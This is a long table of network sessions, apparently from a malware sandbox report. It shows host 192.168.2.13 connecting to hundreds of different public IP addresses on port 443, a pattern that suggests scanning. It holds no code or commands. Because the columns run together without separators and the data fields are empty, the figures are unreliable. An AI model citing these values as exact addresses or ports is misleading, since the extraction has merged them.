                                    21437192.168.2.1347424203.185.61.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21438192.168.2.1357578167.118.177.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21439192.168.2.1351570135.86.22.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21440192.168.2.1358354156.33.223.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21441192.168.2.1354130186.126.106.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21442192.168.2.1358728108.134.151.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21443192.168.2.133598831.23.163.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21444192.168.2.1353656121.29.79.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21445192.168.2.133513683.50.25.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21446192.168.2.135793874.152.163.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21447192.168.2.1356922173.178.211.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21448192.168.2.13452428.235.24.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21449192.168.2.1341788121.121.183.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21450192.168.2.1358634137.127.160.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21451192.168.2.1359832156.52.47.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21452192.168.2.1353634190.214.93.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21453192.168.2.1336726132.13.39.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21454192.168.2.1341976166.78.29.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21455192.168.2.1342412177.62.68.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21456192.168.2.1348134221.148.227.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21457192.168.2.134038644.136.141.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21458192.168.2.1346984149.169.33.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21459192.168.2.133400867.9.74.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21460192.168.2.134658435.218.77.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21461192.168.2.134521292.45.161.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21462192.168.2.1355310149.209.250.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21463192.168.2.134353845.224.93.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21464192.168.2.1338904170.60.180.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21465192.168.2.1349002111.30.132.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21466192.168.2.135664091.157.114.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21467192.168.2.134260491.43.138.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21468192.168.2.135883224.216.197.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21469192.168.2.134106253.101.17.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21470192.168.2.135057038.88.94.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21471192.168.2.1339724155.70.5.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21472192.168.2.1351980212.133.66.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21473192.168.2.1358568176.108.227.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21474192.168.2.135358276.63.109.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21475192.168.2.134698497.154.105.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21476192.168.2.1356250152.162.219.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21477192.168.2.134343432.245.50.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21478192.168.2.133881068.87.146.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21479192.168.2.1341936157.141.129.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21480192.168.2.13357909.117.252.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21481192.168.2.1351530169.230.88.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21482192.168.2.1349034201.63.109.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21483192.168.2.135063017.175.244.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21484192.168.2.1335728175.126.27.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21485192.168.2.136044072.159.121.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21486192.168.2.1344876222.180.67.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21487192.168.2.1347280174.240.118.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21488192.168.2.1340112162.56.103.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21489192.168.2.134192023.53.33.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21490192.168.2.135646057.125.34.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21491192.168.2.1336600137.38.133.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21492192.168.2.133640054.184.188.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21493192.168.2.135519463.42.143.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21494192.168.2.1359486113.162.133.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21495192.168.2.1353148202.121.129.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21496192.168.2.134675831.36.50.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21497192.168.2.13361068.193.111.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21498192.168.2.135973818.156.109.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21499192.168.2.1352588120.56.74.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21500192.168.2.1354496128.92.31.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21501192.168.2.1336768108.22.177.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21502192.168.2.133798239.180.4.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21503192.168.2.1333026114.251.81.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21504192.168.2.134474891.86.157.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21505192.168.2.135775094.167.16.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21506192.168.2.135060076.141.106.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21507192.168.2.1338348133.41.181.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21508192.168.2.1353610213.252.203.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21509192.168.2.1353880180.202.127.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21510192.168.2.13434468.231.133.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21511192.168.2.134717694.76.152.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21512192.168.2.134338037.98.37.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21513192.168.2.1344674116.64.212.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21514192.168.2.135114443.168.70.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21515192.168.2.136091013.147.143.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21516192.168.2.1338080156.240.105.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21517192.168.2.1352040165.133.158.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21518192.168.2.135586267.243.203.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21519192.168.2.133529042.247.225.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21520192.168.2.1355948152.125.252.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21521192.168.2.1347862220.164.121.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21522192.168.2.1343894169.219.246.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21523192.168.2.134181070.74.137.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21524192.168.2.133734662.91.216.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21525192.168.2.1342160125.140.11.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21526192.168.2.13367502.55.83.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21527192.168.2.133838819.140.185.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21528192.168.2.1346466189.205.55.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21529192.168.2.135355247.130.229.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21530192.168.2.1359060183.2.118.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21531192.168.2.1360526129.15.52.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21532192.168.2.1360938134.201.10.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21533192.168.2.1344604222.109.120.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21534192.168.2.134935237.148.63.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21535192.168.2.1358080194.10.172.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21536192.168.2.135914490.204.241.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21537192.168.2.1350820150.123.115.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21538192.168.2.134262248.142.234.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21539192.168.2.135415087.197.175.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21540192.168.2.133774261.7.121.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21541192.168.2.1349448176.134.14.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21542192.168.2.1355994201.144.237.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21543192.168.2.135137432.226.245.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21544192.168.2.1351572143.173.77.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21545192.168.2.135235092.184.202.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21546192.168.2.1342436145.9.11.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21547192.168.2.1346712166.51.181.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21548192.168.2.134711860.76.155.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21549192.168.2.1345444216.104.141.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21550192.168.2.1339304162.153.16.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21551192.168.2.1349358179.215.233.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21552192.168.2.135254298.91.99.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21553192.168.2.1358546212.236.246.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21554192.168.2.1348626151.105.139.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21555192.168.2.1336180147.46.85.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21556192.168.2.136068237.84.24.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21557192.168.2.1359118180.251.189.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21558192.168.2.1350576192.251.162.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21559192.168.2.1356806203.105.64.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21560192.168.2.1356692111.216.98.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21561192.168.2.1335552123.229.124.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21562192.168.2.1357036220.131.252.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21563192.168.2.133685857.1.202.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21564192.168.2.135351664.102.153.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21565192.168.2.1356402172.105.82.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21566192.168.2.1341912187.17.196.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21567192.168.2.1337508170.218.4.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21568192.168.2.1351162199.231.245.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21569192.168.2.1347230195.211.36.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21570192.168.2.135608294.250.33.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21571192.168.2.1356452170.52.204.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21572192.168.2.1359134142.253.240.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21573192.168.2.1342430201.125.255.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21574192.168.2.1336330158.230.177.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21575192.168.2.1339590185.234.120.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21576192.168.2.1333244135.80.95.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21577192.168.2.133627886.103.47.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21578192.168.2.1346486158.120.108.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21579192.168.2.134899449.200.110.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21580192.168.2.13591184.170.168.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21581192.168.2.134914844.191.231.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21582192.168.2.1346256103.62.154.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21583192.168.2.1344202161.110.0.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21584192.168.2.134700085.100.240.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21585192.168.2.1336186210.136.93.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21586192.168.2.135100254.130.163.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21587192.168.2.1347486195.205.232.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21588192.168.2.1335278178.72.66.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21589192.168.2.1348132188.101.95.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21590192.168.2.135200261.94.58.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21591192.168.2.1352408149.135.238.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21592192.168.2.1351654167.78.41.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21593192.168.2.1360258104.196.27.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21594192.168.2.1333406221.241.176.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21595192.168.2.1340984182.109.79.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21596192.168.2.1340914175.184.13.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21597192.168.2.1338572148.48.187.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21598192.168.2.134872489.154.67.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21599192.168.2.1352652187.142.8.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21600192.168.2.1354310177.28.89.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21601192.168.2.134292269.174.75.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21602192.168.2.135641887.31.187.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21603192.168.2.134015075.102.39.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21604192.168.2.13415169.141.12.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21605192.168.2.1345530210.192.228.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21606192.168.2.134296446.135.16.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21607192.168.2.134074473.8.175.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21608192.168.2.134646285.118.115.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21609192.168.2.1348780132.170.229.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21610192.168.2.135466667.59.234.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21611192.168.2.1354006197.117.58.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21612192.168.2.1333606218.255.81.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21613192.168.2.1350722116.218.173.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21614192.168.2.1357090152.86.220.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21615192.168.2.1354326205.247.111.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21616192.168.2.135840471.65.50.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21617192.168.2.1352584140.233.126.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21618192.168.2.1337852102.164.162.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21619192.168.2.1341764182.90.242.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21620192.168.2.135203286.139.215.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21621192.168.2.134411836.105.4.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21622192.168.2.1351050189.161.12.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21623192.168.2.1345714208.45.60.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21624192.168.2.1352578167.208.240.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21625192.168.2.1344304200.23.40.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21626192.168.2.134776882.165.153.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21627192.168.2.1350752204.150.144.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21628192.168.2.1352886135.250.123.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21629192.168.2.133877024.229.232.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21630192.168.2.134817462.134.134.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21631192.168.2.1353638217.223.27.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21632192.168.2.1336566211.96.53.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21633192.168.2.1344592111.142.170.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21634192.168.2.133561089.210.229.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21635192.168.2.1348554222.247.202.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21636192.168.2.1345528200.35.23.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21637192.168.2.1345390162.30.7.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21638192.168.2.1342234219.16.47.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21639192.168.2.134996468.173.185.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21640192.168.2.133296889.29.174.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21641192.168.2.134211451.13.223.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21642192.168.2.134862648.189.246.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21643192.168.2.1338436218.190.178.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21644192.168.2.134920687.88.197.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21645192.168.2.1336470166.171.211.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21646192.168.2.133691471.196.114.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21647192.168.2.1358032212.158.219.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21648192.168.2.1352790223.15.134.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21649192.168.2.1345512126.250.235.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21650192.168.2.1349596117.186.217.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21651192.168.2.134760899.212.135.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21652192.168.2.1337734194.250.171.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21653192.168.2.135207627.1.66.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21654192.168.2.134364861.118.201.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21655192.168.2.1336550176.1.227.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21656192.168.2.133757264.7.251.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21657192.168.2.13335688.188.109.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21658192.168.2.1334480126.158.53.8443
                                    TimestampBytes transferredDirectionData


